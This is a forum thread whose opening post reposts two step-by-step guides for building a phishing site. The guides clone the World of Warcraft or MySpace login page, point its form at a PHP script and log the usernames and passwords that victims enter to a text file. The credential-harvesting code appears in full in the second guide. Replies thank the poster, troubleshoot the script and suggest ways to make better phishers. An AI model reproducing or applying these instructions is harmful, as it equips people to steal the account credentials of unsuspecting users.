2 Guides in one! How to make your Own Phishing site!! menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Results 1 to 8 of 8
  1. #1
    Saaen's Avatar Contributor
    Reputation
    124
    Join Date
    Jun 2008
    Posts
    562
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    2 Guides in one! How to make your Own Phishing site!!

    2 Guides in one! How to make your Own Phishing site!!
    I saw these nice guides on hackforums.net and decided to post them to share! (doubt anyone else would) Anyway.... Ever wanted a phishing site made by you? Whether it's WoW (that's why it's in wow scams" or some other thing (myspace).

    Well after I got a couple requests from people in my scam help thread, I went to find them. Anyway.... (again) These aren't mine, I will be giving credit to the person on hackforums who posted them, but I will change a couple words in the guide to fit for wow. There are two guides I'm about to list, ones somewhat easy to follow and ones not, choose the one you like!


    Guide one!

    1. First things first you must choose the site which you wanna make a phisher from.

    2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

    3. Open the "index.htm" with notepad and find search the source for the word "action". you should find a command looking like this

    or anything alike.

    4. change the url (in this case "RANDOM URL") to "next.php"

    5. Save index.htm

    6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of Most Endorsed FREE Website Hosting Provider | Free Website Hosting. Create a free website.

    7. login to your website and go to "file manager"

    8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

    9. Create a new file called next.php and copy / paste this:

    Code:
     $value) {
    fwrite($handle,
    
    $variable);
    fwrite($handle, "=");
    
    fwrite($handle, $value);
    fwrite($handle,
    
    "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
    header("Location: Sign In ");

    11. Save this file (next.php)

    12. Create a new file called "pass.txt". dont write anything in it. just save it empty. Your done making your phising site!

    13. test out your website. type in something in your phisher and then go to filemanager and open "pass.txt" what you wrote should be typed here!

    14. if its not typed there you should try editing "next.php" and enter this instead:

    Code:
     $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    think you know what to do with the "RANDOM" url.

    NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "password.txt" instead of "pass.txt"

    Credits to Mathias of Hackforums.net

    Well, onto guide two!

    Guide Two (This one is not step by step)

    All you need is a web hosting service with PHP enabled.
    We will use t35. Go to Free Web Hosting with PHP, Domains, and FTP - T35 Hosting and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
    Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'login.php'(without the ''), and save it.
    Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.t35.com/login.php' - where 'xxx' is the name of your account.
    But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
    What do we need to change?
    What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
    Open your 'login.php' file. Search in the code for keywords 'action='.
    There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
    After some searching, we find the:

    Code:
    Member Login
    (The myspace part is there b/c this perosn used a myspace source code, a WoW one will be different)

    and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
    Change:
    action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
    To:
    action="phish.php"
    and save the file.

    Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
    Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'phish.php' file on your site(which doesn't exist yet).
    All we have to do now, is to create a 'phish.php' file that contains a function that writes down the username and password into a text document.
    Make another file named 'phish.php'(without the quotes) and paste the following code in it:

    Code:
    ?php
    header ('Location: http:/websiteyouwanttomakeaphisherfor.com ');
    $handle = fopen("passwords.txt", "a");
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    The function of phish.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the information there(the username and password).
    Congratulations! You have a phisher!Superman
    The link to your phish site is:
    http://xxx.t35.com/login.php -where 'xxx' is your account name.
    The link to your text file is:
    http://xxx.t35.com/passwords.txt
    Or you may access it from your account.

    Note that you can choose whatever names you like for login.php, phish.php and passwords.txt. but the .php and .txt must stay the same.

    Credits (mostly) Crow of hackforunms.net

    Well, that's all that's needed since everybody knows how they are spread! Good luck with your own phisher (whatever it is about)

    2 Guides in one! How to make your Own Phishing site!!
  2. #2
    ShadeRat's Avatar Member
    Reputation
    5
    Join Date
    Mar 2007
    Posts
    99
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    pass.txt is growing bigger when i type in info, but i cant view what i typed. Going to see if password.txt is any better

  3. #3
    creesy's Avatar Member
    Reputation
    3
    Join Date
    Aug 2008
    Posts
    87
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    thanks mate good guide if i could rep i would

  4. #4
    Saaen's Avatar Contributor
    Reputation
    124
    Join Date
    Jun 2008
    Posts
    562
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You can rep me, unless you need to spread :P. (not asking, just saying that he has the option too)

  5. #5
    JohnPreston's Avatar Contributor
    Reputation
    216
    Join Date
    Feb 2007
    Posts
    569
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Saaen, now I'm in your topic for a change lol.

    +Rep X2 EDIT (after I spread it...)

  6. #6
    [Royal]'s Avatar Banned
    Reputation
    336
    Join Date
    Mar 2008
    Posts
    694
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Its a good guide and thanks for sharing, I'm not going to rep because you didn't make it, but thanks A TON for posting this here for others.

  7. #7
    XatoA's Avatar Active Member
    Reputation
    25
    Join Date
    Nov 2007
    Posts
    128
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Wow great guide, if i wasnt a leecher id +rep u

  8. #8
    Tanax's Avatar Active Member
    Reputation
    53
    Join Date
    Jan 2007
    Posts
    239
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hmm.. not to sound negative or anything.. but the phishers created with these scripts are, sorry to say, not even worth having. The phishers script will be so bad, so that noone will fall for it. And if someone would actually fall for it, they will be so noobie that the account isn't worth having.

    Why? Cause the script doesn't really run ANY checks on for example required fields. If a field is a number, then it doesn't check that. It doesn't have any errorchecking whatsoever.

    I'd say; Learn some PHP instead of trying this out. Sure, this could be a good start, but I would suggest you to actually learn the PHP language, before trying to create phisher scripts.
    Just my 2 cents.
    Hm.

Similar Threads

  1. How to make my own phishing site?
    By Yoti in forum Community Chat
    Replies: 3
    Last Post: 03-15-2009, 01:36 AM
  2. How to Create your OWN Phishing Site
    By cobey321 in forum World of Warcraft Guides
    Replies: 8
    Last Post: 05-16-2008, 06:36 AM
  3. Replies: 9
    Last Post: 04-22-2008, 03:09 PM
  4. [Guide] How to make your own Machinima
    By TDWP in forum World of Warcraft General
    Replies: 0
    Last Post: 04-04-2008, 12:38 AM
  5. [Guide] How to make your own graveyard
    By latruwski in forum World of Warcraft Emulator Servers
    Replies: 15
    Last Post: 02-28-2008, 01:43 AM
All times are GMT -5. The time now is 05:20 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search